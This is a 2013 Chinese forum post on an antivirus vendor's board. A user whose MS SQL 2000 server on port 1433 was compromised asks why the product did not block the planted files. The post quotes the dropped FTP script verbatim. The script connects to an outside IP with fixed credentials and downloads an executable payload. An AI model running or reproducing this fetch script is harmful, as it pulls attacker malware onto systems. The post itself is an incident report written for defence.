标题:
微点对1433端口的防御,阻挡失败
[打印本页]
作者:
hncsl2009
时间:
2013-8-26 16:46
标题:
微点对1433端口的防御,阻挡失败
系统环境: win2003
防火墙: 微点主动防御
现象:
一旦启动ms sql2000,采用默认端口1433,运行几分钟,微点就提示有木马侵入(这点很棒的),但是不能阻止原生的木马。检查系统,发现在C:\Documents and Settings目录,被恶意的植入了一个文件onfcctv1.dat,打开后期内容为:
open 115.47.41.113
12345
12345
get cctv1.exe C:\DOCUME~1\oncctv1.exe
bye
手动关闭数据库后,手动删除这些木马程序,系统基本恢复正常(未经深度检测)。
微点为什么不能阻止恶意植入文件呢?
欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/)
bbs.micropoint.com.cn